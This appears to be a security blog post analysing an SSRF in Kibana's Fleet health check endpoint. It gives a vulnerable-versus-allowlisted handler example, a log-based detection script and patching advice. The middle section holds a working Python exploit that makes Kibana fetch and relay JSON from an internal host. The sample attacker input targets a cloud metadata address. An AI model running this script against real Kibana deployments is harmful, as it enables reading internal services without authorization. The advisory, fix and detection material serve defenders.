A recent vulnerability, CVE-2024-43710, has been disclosed in Kibana, the data visualization and exploration front end for Elasticsearch and a core component of the Elastic Stack alongside Elasticsearch, Beats and Logstash. It is a server-side request forgery (SSRF) issue in the '/api/fleet/health_check' API endpoint. This blog post provides an analysis of the vulnerability, relevant code snippets, the original references and exploit details.
Vulnerability details
The vulnerability lies in the Kibana Fleet health check API, exposed at '/api/fleet/health_check'. The endpoint accepts a Fleet Server host from the caller and has Kibana fetch a status document from it, so a user holding only read access to Fleet can make Kibana issue requests to internal endpoints on their behalf, potentially leading to unauthorized access to, or disclosure of, data from services that are reachable from the Kibana host but not from the attacker. The SSRF has two limitations: the target must be an HTTPS URL, and Kibana only hands back the response if it parses as JSON. Neither is much protection in practice, since internal management APIs are commonly served over HTTPS and answer in JSON.
Exploit scenario
An attacker with read permissions to Fleet sends a request to '/api/fleet/health_check' naming an internal HTTPS host, which causes Kibana to make an outbound request to that host. If the target returns JSON, Kibana includes the parsed body in its own response, and the attacker reads data from a service they could not reach directly.
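To make the root cause concrete, here is an added illustration (written for this post, not Kibana's source) of the vulnerable handler pattern beside an allowlisted alternative. It assumes the request body names the target as 'host' and that a fixed status path is appended to it; the hardened form instead takes an 'id' that is resolved against server-side configuration. FLEET_SERVER_HOSTS, STATUS_PATH and the function names are assumptions made for the example.

```python
"""Added example: allowlist fix for an SSRF-prone health check handler.

Illustrative code written for this post, not Kibana's source. The vulnerable
form takes a caller-supplied host and only checks its scheme; the hardened form
takes an identifier and resolves it against the server's own configured Fleet
Server hosts. FLEET_SERVER_HOSTS, STATUS_PATH and the function names are
assumptions, not Kibana identifiers.
"""
from urllib.parse import urlsplit

# Constructed stand-in for the Fleet Server hosts an operator has configured.
FLEET_SERVER_HOSTS = {
    "fs-prod": "https://fleet.example.internal:8220",
    "fs-dr": "https://fleet-dr.example.internal:8220",
}

STATUS_PATH = "/api/status"  # assumed probe path appended to the chosen host


class HealthCheckRejected(ValueError):
    """Raised when a request body fails validation."""


def build_probe_url(host: str) -> str:
    """Append the status path to a base host URL."""
    return host.rstrip("/") + STATUS_PATH


def health_check_vulnerable(body: dict) -> str:
    """Vulnerable form: any https:// host the caller names gets probed.

    The scheme check limits the attacker to HTTPS targets but does nothing to
    stop Kibana from reaching internal services it can route to.
    """
    host = body.get("host")
    if not isinstance(host, str):
        raise HealthCheckRejected("host must be a string")
    parts = urlsplit(host)
    if parts.scheme != "https" or not parts.netloc:
        raise HealthCheckRejected("host must be an https:// URL")
    return build_probe_url(host)


def health_check_hardened(body: dict, configured=FLEET_SERVER_HOSTS) -> str:
    """Hardened form: the caller picks a configured host by id, never by URL.

    The outbound target comes from server-side configuration, so a user with
    read access cannot steer the request anywhere else.
    """
    host_id = body.get("id")
    if not isinstance(host_id, str) or host_id not in configured:
        raise HealthCheckRejected("unknown fleet server host id")
    return build_probe_url(configured[host_id])


def rejects(fn, body: dict) -> bool:
    """True if the handler refuses the given body."""
    try:
        fn(body)
    except HealthCheckRejected:
        return True
    return False


if __name__ == "__main__":
    attacker_body = {"host": "https://169.254.169.254"}
    print("vulnerable probes:", health_check_vulnerable(attacker_body))
    print("hardened rejects same body:", rejects(health_check_hardened, attacker_body))
    print("hardened probes configured host:", health_check_hardened({"id": "fs-prod"}))
```

The point of the hardened form is that the set of reachable hosts is decided by whoever administers Fleet, not by whoever holds a read role; a scheme or content-type check alone only narrows the SSRF, it does not remove it.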
Original references
1. Elastic Security Advisory: the official advisory from Elastic describing the SSRF vulnerability and the releases that fix it.
2. NVD - National Vulnerability Database: the US National Vulnerability Database entry for CVE-2024-43710.
Here's a Python code snippet illustrating how an attacker might exploit the SSRF vulnerability:
import requests

kibana_url = 'https://kibana.example.com'  # Replace with target Kibana instance URL
internal_endpoint = 'https://internal.example.com'  # Replace with internal HTTPS host to probe
username, password = 'fleet-reader', 'password'  # Any account with Fleet read access

# The affected endpoint takes the target as "host"; Kibana then fetches a status
# document from that host and relays the JSON it receives.
payload = {
    "host": internal_endpoint
}

response = requests.post(
    f"{kibana_url}/api/fleet/health_check",
    json=payload,
    headers={
        "Content-Type": "application/json",
        "kbn-xsrf": "true",  # Kibana rejects API requests without this header
    },
    auth=(username, password),
    timeout=30,
)
print(response.status_code)
print(response.json())
This script authenticates to Kibana as a user with Fleet read access and sends a POST request to the '/api/fleet/health_check' endpoint naming the internal host to probe (the 'kbn-xsrf' header is mandatory on Kibana API requests, which would otherwise be rejected). When the targeted host answers in JSON, the script prints the body that Kibana relayed.
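The request above leaves a footprint that is easy to hunt for while patches roll out. The following detection pass is an added example written for this post, not an Elastic-supplied rule: it counts POSTs to the health check endpoint per user and source address and flags callers outside an expected operator set. The events in SAMPLE_EVENTS are constructed in a simplified ECS-like shape modelled on Kibana's http_request audit events; the exact field names, the EXPECTED_OPERATORS set and the threshold are assumptions to adapt to your deployment.

```python
"""Added example: spotting Fleet health_check calls in audit events.

Detection logic written for this post, not an Elastic-supplied rule. The
events in SAMPLE_EVENTS are constructed in a simplified ECS-like shape; the
field names, EXPECTED_OPERATORS and the threshold are assumptions.
"""
import json
from collections import Counter

HEALTH_CHECK_PATH = "/api/fleet/health_check"
EXPECTED_OPERATORS = {"fleet-admin"}  # assumed accounts expected to run health checks


def _event(ts, user, method, path, ip):
    """Build one constructed audit event as a JSON line."""
    return json.dumps({
        "@timestamp": ts,
        "event": {"action": "http_request"},
        "user": {"name": user},
        "http": {"request": {"method": method}},
        "url": {"path": path},
        "client": {"ip": ip},
    })


# Constructed sample: one legitimate operator call, one analyst hitting the
# endpoint repeatedly, an unrelated Fleet read, and a truncated line that the
# parser must skip rather than crash on.
SAMPLE_EVENTS = "\n".join([
    _event("2025-01-24T10:00:01Z", "fleet-admin", "post", HEALTH_CHECK_PATH, "10.0.0.5"),
    _event("2025-01-24T10:05:12Z", "analyst", "post", HEALTH_CHECK_PATH, "203.0.113.7"),
    _event("2025-01-24T10:05:13Z", "analyst", "post", HEALTH_CHECK_PATH, "203.0.113.7"),
    _event("2025-01-24T10:05:14Z", "analyst", "post", HEALTH_CHECK_PATH, "203.0.113.7"),
    _event("2025-01-24T10:06:00Z", "analyst", "get", "/api/fleet/agents", "203.0.113.7"),
    '{"@timestamp": "2025-01-24T10:07:00Z", "event": {"action": "http_req',
])


def iter_events(text):
    """Yield parsed JSON events, skipping blank or malformed lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue


def is_health_check(event) -> bool:
    """True for a POST to the Fleet health check endpoint."""
    method = event.get("http", {}).get("request", {}).get("method", "")
    path = event.get("url", {}).get("path", "")
    return method.lower() == "post" and path == HEALTH_CHECK_PATH


def health_check_callers(text) -> Counter:
    """Count health check calls per (user, source ip) pair."""
    counts = Counter()
    for ev in iter_events(text):
        if is_health_check(ev):
            user = ev.get("user", {}).get("name", "?")
            ip = ev.get("client", {}).get("ip", "?")
            counts[(user, ip)] += 1
    return counts


def suspicious_callers(text, expected=EXPECTED_OPERATORS, threshold=1):
    """Callers outside the expected operator set that hit the endpoint at
    least `threshold` times, sorted by count, highest first."""
    hits = []
    for (user, ip), n in health_check_callers(text).items():
        if user not in expected and n >= threshold:
            hits.append({"user": user, "ip": ip, "count": n})
    return sorted(hits, key=lambda h: (-h["count"], h["user"]))


if __name__ == "__main__":
    for hit in suspicious_callers(SAMPLE_EVENTS):
        print(f"{hit['user']} from {hit['ip']}: {hit['count']} health check calls")
```

Audit logs do not record the request body, so the probed host is not visible here; the signal is who is calling an endpoint that only Fleet operators have a reason to use, and how often.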
Mitigation
It's critical to update Kibana to a version that isn't affected by this vulnerability. Elastic has addressed this SSRF in patched releases of the supported 7.17.x and 8.x lines; the Elastic Security Advisory lists the exact fixed versions.
To protect your systems, update Kibana to one of those versions immediately. Until the update is applied, limit the blast radius: review which roles carry the Fleet read privilege and remove it from accounts that do not need it, and restrict outbound connections from the Kibana host to the Fleet Servers and Elasticsearch nodes it actually needs, so an SSRF has fewer internal HTTPS services to reach.
Conclusion
While the SSRF vulnerability associated with CVE-2024-43710 has certain limitations, it still presents a significant risk to Kibana instances where users hold read access to Fleet. By understanding the vulnerability, developers and administrators can take steps to mitigate the risk, namely by updating Kibana to a fixed version. Always ensure you're running the most recent, patched version of software to minimize exposure to known vulnerabilities.
Timeline
Published on: 01/23/2025 06:15:27 UTC